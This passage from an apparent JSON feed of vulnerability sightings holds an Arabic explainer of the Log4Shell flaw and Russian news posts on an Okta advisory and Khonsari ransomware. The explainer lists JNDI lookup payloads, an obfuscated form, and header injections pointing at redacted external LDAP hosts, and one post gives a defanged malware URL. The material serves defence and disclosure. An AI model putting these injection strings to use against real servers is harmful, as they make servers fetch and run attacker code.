\u0627\u0641\u062a\u0631\u0627\u0636\u064a \u0648\u0625\u0632\u0627\u0644\u0629 \u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u062a\u0645\u0627\u0645\u0627 \u0648\u0642\u0627\u0645\u062a \u0628\u0625\u0635\u062f\u0627\u0631 \u0627\u0644\u0625\u0635\u0644\u0627\u062d \u0627\u0644\u062b\u0627\u0646\u064a Log4j 2.16 \u0644\u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u062e\u0637\u0623 \u0627\u0644\u0630\u064a \u062a\u0645 \u062a\u0639\u064a\u064a\u0646\u0647 \u0643\u0640 CVE-2021-45046 \n\n\u0643\u064a\u0641 \u062a\u0639\u0645\u0644 \u062b\u063a\u0631\u0629 Log4Shell ..\u061f\n\u0628\u062f\u0627\u064a\u0629\u064b \u0645\u0627 \u0647\u0648 Log4j \u0648 JNDI ..\u061f\nLog4j\n\u0645\u0643\u062a\u0628\u0629 Java \u0628\u0645\u062b\u0627\u0628\u0629 \u0623\u062f\u0627\u0629 
\u0645\u0633\u0627\u0639\u062f\u0629 \u062a\u0633\u062a\u062e\u062f\u0645 \u0639\u0644\u0649 \u0646\u0637\u0627\u0642 \u0648\u0627\u0633\u0639 \u0641\u064a \u0628\u0631\u0627\u0645\u062c Java \u0644\u062a\u0633\u062c\u064a\u0644 \u0631\u0633\u0627\u0626\u0644 \u0627\u0644\u062e\u0637\u0623 \u0641\u064a \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0648\u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u064a\u0636\u0627 \u0641\u064a \u062e\u062f\u0645\u0627\u062a cloud computing\n\nJNDI\n\u0648\u0627\u062c\u0647\u0629 \u0628\u0631\u0645\u062c\u0629 \u062a\u0637\u0628\u064a\u0642\u0627\u062a Java APIs \u062a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 Log4j \u0644\u0627\u0633\u062a\u0631\u062f\u0627\u062f \u0627\u0644\u0639\u0646\u0627\u0635\u0631 \u0648\u0627\u0644\u0643\u0627\u0626\u0646\u0627\u062a \u0645\u0646 \u0648\u062d\u062f\u0627\u062a \u0627\u0644\u062e\u062f\u0645\u0629 \u0627\u0644\u0628\u0639\u064a\u062f\u0629 \u0648\u064a\u0645\u0643\u0646 \u0644\u0647 \u0627\u0644\u0627\u0633\u062a\u0641\u0627\u062f\u0629 \u0645\u0646 \u0627\u0644\u0639\u062f\u064a\u062f \u0645\u0646 \u0648\u0627\u062c\u0647\u0627\u062a \u0627\u0644\u062f\u0644\u064a\u0644 \u0628\u0645\u0627 \u0641\u064a \u0630\u0644\u0643 \u0648\u0627\u062c\u0647\u0629\u00a0\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0627\u0644\u0648\u0635\u0648\u0644 \u0627\u0644\u062e\u0641\u064a\u0641 \u0625\u0644\u0649 \u0627\u0644\u062f\u0644\u064a\u0644\u00a0LDAP \u0648\u0646\u0638\u0627\u0645 \u0627\u0633\u0645\u0627\u0621 \u0627\u0644\u0645\u062c\u0627\u0644\u00a0(DNS) \u0648\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 (IIOP) \n\n\u0633\u0628\u0628 \u0627\u0644\u062e\u0644\u0644\n\u0639\u0646\u062f \u062a\u0634\u063a\u064a\u0644 \u0645\u064a\u0632\u0629 \u0627\u0633\u062a\u0628\u062f\u0627\u0644 \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0627\u0644\u0631\u0633\u0627\u0626\u0644\u00a0\u0633\u062a\u0643\u062a\u0634\u0641 Log4j \u0627\u0644\u0633\u0644\u0627\u0633\u0644 
\u0627\u0644\u062a\u064a \u062a\u0634\u064a\u0631 \u0625\u0644\u0649 \u0645\u0648\u0627\u0631\u062f JNDI \u0641\u064a \u0645\u0635\u0627\u062f\u0631 \u0627\u0644\u062a\u0643\u0648\u064a\u0646 \u0648\u0631\u0633\u0627\u0626\u0644 \u0627\u0644\u0633\u062c\u0644 \u0648\u0627\u0644\u0645\u0639\u0627\u0645\u0644\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0645 \u062a\u0645\u0631\u064a\u0631\u0647\u0627 \u0628\u0648\u0627\u0633\u0637\u0629 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a\u060c \u0648\u0646\u0638\u0631\u0627 \u0644\u0623\u0646 Log4j \u0644\u0627 \u064a\u0642\u0648\u0645 \u0628\u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0639\u0646\u0627\u0648\u064a\u0646 url \u0627\u0644\u062a\u064a \u062a\u0645 \u0625\u0631\u0633\u0627\u0644\u0647\u0627 \u0641\u064a \u0647\u0630\u0647 \u0627\u0644\u0633\u0644\u0627\u0633\u0644 \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0634\u0627\u0621 \u0637\u0644\u0628\u0627\u062a \u0636\u0627\u0631\u0629 \u0644\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0633\u062a\u062e\u062f\u0645 Log4j \u0628\u0627\u0633\u062a\u0628\u062f\u0627\u0644 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u0641\u064a \u0627\u0644\u062d\u0642\u0648\u0644 \u0627\u0644\u062a\u064a \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0639\u0646\u0627\u0648\u064a\u0646 url \u0628\u062e\u0648\u0627\u062f\u0645 \u0636\u0627\u0631\u0629\n\u0639\u0644\u0649 \u0633\u0628\u064a\u0644 \u0627\u0644\u0645\u062b\u0627\u0644 \u0641\u064a \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0648\u064a\u0628 \u0646\u0638\u0631\u0627 \u0644\u0623\u0646\u0647 \u064a\u062a\u0645 \u062a\u0633\u062c\u064a\u0644 \u0637\u0644\u0628\u0627\u062a\u00a0HTTP\u00a0\u0628\u0634\u0643\u0644 \u0645\u062a\u0643\u0631\u0631 \u0641\u0625\u0646 \u0645\u062a\u062c\u0647 \u0627\u0644\u0647\u062c\u0648\u0645 \u0627\u0644\u0634\u0627\u0626\u0639 \u0647\u0648 \u0648\u0636\u0639 
\u0627\u0644\u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u0636\u0627\u0631\u0629 \u0641\u064a\u00a0\u0639\u0646\u0648\u0627\u0646 url \u0644\u0637\u0644\u0628 HTTP \u0623\u0648\u00a0\u0631\u0623\u0633 HTTP\u00a0\u064a\u062a\u0645 \u062a\u0633\u062c\u064a\u0644\u0647 \u0628\u0634\u0643\u0644 \u0645\u062a\u0643\u0631\u0631\n\u0645\u062b\u0644: \n\u00a0${jndi:[protocol]://[remote server and code address]}\n\u064a\u062a\u0645 \u0639\u0631\u0636 \u0639\u0646\u0648\u0627\u0646 url \u0627\u0644\u0630\u064a \u0642\u0627\u0645 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u062a\u0639\u064a\u064a\u0646\u0647 \u0643\u0628\u064a\u0627\u0646\u0627\u062a \u0639\u0646\u0635\u0631 Java \u0648\u0628\u0639\u062f\u0647\u0627 \u064a\u062a\u0645 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0645\u0646 \u0647\u0630\u0627 \u0627\u0644\u0639\u0646\u0648\u0627\u0646 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0645\u062a\u0635\u0644\u0627 \u0628\u0627\u0644\u0625\u0646\u062a\u0631\u0646\u062a \u0648\u0628\u0625\u062f\u062e\u0627\u0644 \u0633\u0644\u0633\u0644\u0629 \u064a\u062a\u0645 \u062a\u0633\u062c\u064a\u0644\u0647\u0627 \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u062a\u062d\u0645\u064a\u0644 \u0648\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0636\u0627\u0631\u0629 \u0645\u0633\u062a\u0636\u0627\u0641\u0629 \u0639\u0644\u0649 \u0639\u0646\u0648\u0627\u0646 url \u0639\u0627\u0645 \u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630\u0647\u0627 \u062a\u0644\u0642\u0627\u0626\u064a\u0627 \u0641\u064a \u0627\u0644\u0630\u0627\u0643\u0631\u0629\n\u064a\u0648\u062c\u062f \u0645\u062c\u0645\u0648\u0639\u0629 \u0645\u062a\u0646\u0648\u0639\u0629 \u0645\u0646 \u0623\u0634\u0643\u0627\u0644 \u0627\u0644\u062a\u0639\u062a\u064a\u0645 \u062a\u064f\u0633\u062a\u062e\u062f\u0645 \u0644\u0645\u0646\u0639 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u0641\u062d\u0635 
\u0623\u0648 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0645\u062b\u0644:\n($ {$ {:: - j} $ {:: - n} $ {:: - d} $ {:: - I})\u00a0\n\u0628\u0639\u0636 \u0631\u0624\u0648\u0633 HTTP \u0627\u0644\u062a\u064a \u0644\u0627\u062d\u0638\u0647\u0627 \u0627\u0644\u0628\u0627\u062d\u062b\u0648\u0646 \u0641\u064a \u0637\u0644\u0628 GET\u00a0\nreferer=${jndi:ldap://[redacted].interact.sh}\nx-http-host-override=${jndi:ldap://[redacted].interact.sh}\ntrue-client-ip=${jndi:ldap://[redacted].interact.sh}\nx-forwarded-port=443, x-client-ip=${jndi:ldap://[redacted].interact.sh}\ncf-connecting_ip=${jndi:ldap://[redacted].interact.sh}\nx-forwarded-host=${jndi:ldap://[redacted].interact.sh}\ncontact=${jndi:ldap://[redacted].interact.sh} \n\n\u0644\u0627\u062d\u0638 \u0627\u0644\u0628\u0627\u062d\u062b\u0648\u0646 \u0623\u064a\u0636\u0627 \u062a\u062d\u0648\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0625\u0644\u0649 \u0648\u0627\u062c\u0647\u0629 \u0628\u0631\u0645\u062c\u0629 \u062a\u0637\u0628\u064a\u0642\u0627\u062a RMI \u0628\u062f\u0644\u0627 \u0645\u0646 \u0648\u0627\u062c\u0647\u0629 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 LDAP \n\nLog4j 2.16.0 _ CVE-2021-45046 \nhttps://logging.apache.org/log4j/2.x/security.html\n\n\u0644\u0641\u062d\u0635 \u062b\u063a\u0631\u0627\u062a Log4Shell \u0648\u0625\u0635\u0644\u0627\u062d\u0647\u0627 \u0628\u0645\u0627 \u0641\u064a \u0630\u0644\u0643 log4j 2.15.0 \u0627\u0644\u0645\u0635\u0646\u0641\u0629 CVE-2021-45046\nhttps://github.com/logpresso/CVE-2021-44228-Scanner\n\nFind vulnerable Log4j2 versions on disk and also inside Java Archive Files\nhttps://github.com/fox-it/log4j-finder", "creation_timestamp": "2021-12-17T00:07:48.000000Z"}, {"uuid": "4c9b51e5-c138-43e1-a109-cdb36ae9f21e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/true_secator/2677", 
"content": "NHS Digital \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e\u0431 RCE \u0432 Windows-\u043a\u043b\u0438\u0435\u043d\u0442\u0435 \u0434\u043b\u044f \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 Okta Advanced Server Access.\n\n\u0420\u0435\u0448\u0435\u043d\u0438\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 \u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c Zero Trust \u0434\u043b\u044f \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0439 \u0438 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b, \u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0442\u044b\u0441\u044f\u0447\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 CVE-2022-24295 \u0438 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u0430 \u0432\u0441\u0435\u043c \u0432\u0435\u0440\u0441\u0438\u044f\u043c \u041f\u041e \u0434\u043e 1.57.0 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e. 
\u0423\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a, \u043d\u0435 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0438\u0439 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438, \u043c\u043e\u0436\u0435\u0442 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0432 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 URL-\u0430\u0434\u0440\u0435\u0441.\n\n\u0423\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043f\u043e\u043b\u043d\u043e\u043c\u0443 \u0437\u0430\u0445\u0432\u0430\u0442\u0443 \u0441\u0438\u0441\u0442\u0435\u043c\u044b. 
\u041f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0435\u0439 \u043e\u0448\u0438\u0431\u043a\u0438, \u043f\u044b\u0442\u0430\u044f\u0441\u044c \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u0435\u0435 \u0437\u043b\u043e\u043d\u0430\u043c\u0435\u0440\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\nNHS Digital \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043f\u043e\u0441\u043a\u043e\u0440\u0435\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u043e\u0431\u0445\u043e\u0434\u043d\u044b\u0445 \u043f\u0443\u0442\u0435\u0439 \u0434\u043b\u044f \u0432\u043d\u043e\u0432\u044c \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. 
\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0432\u043d\u043e\u0432\u044c \u0432\u044b\u0448\u0435\u0434\u0448\u0438\u0439 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044c NHS Digital \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439\u00a0Log4Shell (CVE-2021-45105, CVE-2021-45046 \u0438 CVE-2021-44228) \u0432 Okta.", "creation_timestamp": "2022-02-28T15:06:00.000000Z"}, {"uuid": "f8e32fc2-8da5-4b58-827d-1078d9aee0c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/true_secator/2446", "content": "\u041f\u043e\u0434\u0442\u044f\u043d\u0443\u043b\u0430\u0441\u044c \u0442\u044f\u0436\u0435\u043b\u0430\u044f \u0430\u0440\u0442\u0438\u043b\u043b\u0435\u0440\u0438\u044f: \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0438\u0439 Jam, \u043a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0438, \u0435\u0449\u0435 \u0432\u043f\u0435\u0440\u0435\u0434\u0438.\n \n\u0412\u0441\u0435 \u044d\u0442\u043e \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a CVE-2021-44228 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0435\u0449\u0435 6 \u0434\u0435\u043a\u0430\u0431\u0440\u044f \u0441 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c Log4j 2.15.0, \u0430 \u0432\u044b\u0437\u0432\u0430\u043d\u043d\u0430\u044f \u044d\u0442\u0438\u043c \u043f\u0430\u0442\u0447\u0435\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0430\u044f CVE-2021-45046 
(\u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0432\u0448\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c log4shell  \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u0445 \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u0430\u0442\u0430\u043a \u0441 \u043e\u0442\u043a\u0430\u0437\u043e\u043c \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438) \u0442\u0430\u043a\u0436\u0435 \u0431\u044b\u043b\u0430 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c \u0441\u0430\u043c\u043e\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 Log4j 2.12.2 \u0438 2.16.0, \u0443\u0434\u0430\u043b\u044f\u044e\u0449\u0435\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u043f\u043e\u0438\u0441\u043a\u0430 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439 \u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u044e\u0449\u0435\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a JNDI.\n \n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u0431\u043e\u043b\u0435\u0435 70 \u043e\u0431\u0440\u0430\u0437\u0446\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e, \u0447\u0442\u043e \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043f\u043e \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u044e \u0441 \u0442\u0435\u043c, \u0447\u0442\u043e, 
\u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0443\u0436\u0435 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n \n\u041d\u043e \u0447\u0442\u043e \u0435\u0449\u0435 \u0445\u0443\u0436\u0435, Bitdefender \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0437\u0430 Log4Shell \u0432\u0437\u044f\u043b\u0438\u0441\u044c \u043f\u0435\u0440\u0432\u044b\u0435 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0438. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u044b\u0442\u0430\u044e\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0443 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0434\u0432\u043e\u0438\u0447\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 .NET \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0448\u0438\u0444\u0440\u0443\u0435\u0442 \u0444\u0430\u0439\u043b\u044b \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 c \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435\u043c khonsari. 
\u0417\u0430\u043f\u0438\u0441\u043a\u0430 \u0441 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u044b\u043a\u0443\u043f\u0430 \u00ab\u041a\u0410\u041a \u041f\u041e\u041b\u0423\u0427\u0418\u0422\u042c \u0421\u0412\u041e\u0418 \u0424\u0410\u0419\u041b\u042b BACK.TXT\u00bb \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0430 \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u0441\u0442\u043e\u043b.\n \n\u041f\u0435\u0440\u0432\u044b\u0439 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442 \u0431\u044b\u043b \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d 11 \u0434\u0435\u043a\u0430\u0431\u0440\u044f, \u043a\u043e\u0433\u0434\u0430 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0445\u043e\u0441\u0442 \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u0432\u043e\u0438\u0447\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0441 hxxp://3.145.115.94/zambo/groenhuyzen.exe. \u042d\u0442\u043e \u043d\u043e\u0432\u043e\u0435 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0445 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u0441\u0432\u043e\u0435\u043c\u0443 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044e \u0432 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u0430\u0445. 
\u0412 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0441\u0432\u043e\u0435 \u041f\u041e \u0445\u0430\u043a\u0435\u0440\u044b \u043d\u0430\u0440\u0435\u043a\u043b\u0438 \u0438\u043c\u0435\u043d\u0435\u043c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0430 \u0430\u043d\u0442\u0438\u043a\u0432\u0430\u0440\u043d\u043e\u0433\u043e \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 \u0432 \u041b\u0443\u0438\u0437\u0438\u0430\u043d\u0435. \u041f\u043e\u0447\u0435\u043c\u0443 \u2013 \u043d\u0435 \u044f\u0441\u043d\u043e.\n \n\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 Khonsari \u0441\u043a\u0430\u043d\u0438\u0442 \u0432\u0441\u0435 \u0434\u0438\u0441\u043a\u0438 \u0438 \u0448\u0438\u0444\u0440\u0443\u0435\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u043f\u0430\u043f\u043a\u0438 \u0441 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438, \u0432\u0438\u0434\u0435\u043e, \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f\u043c\u0438, \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430\u043c\u0438 \u0438 \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u0441\u0442\u043e\u043b. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0435 \u0448\u0438\u0444\u0440\u0443\u044e\u0442\u0441\u044f \u0444\u0430\u0439\u043b\u044b \u0441 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f\u043c\u0438 .ini \u0438 .lnk. \u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 AES 128 CBC \u0441 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0430 PaddingMode.Zeros \u0434\u043b\u044f \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f. 
\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438 BitDefender \u0432 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0442\u043e\u0442 \u0436\u0435 \u0441\u0435\u0440\u0432\u0435\u0440 \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f RAT Orcus.\n \n\u041d\u0435 \u043e\u0431\u043e\u0448\u043b\u043e\u0441\u044c \u0438 \u0431\u0435\u0437 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0445 \u0438 \u0438\u0440\u0430\u043d\u0441\u043a\u0438\u0445 \u0410\u0420\u0422, \u0441\u043b\u0435\u0434\u044b \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u044b\u044f\u0432\u0438\u043b\u0438 \u0441\u043f\u0435\u0446\u044b \u0438\u0437 Mandiant. 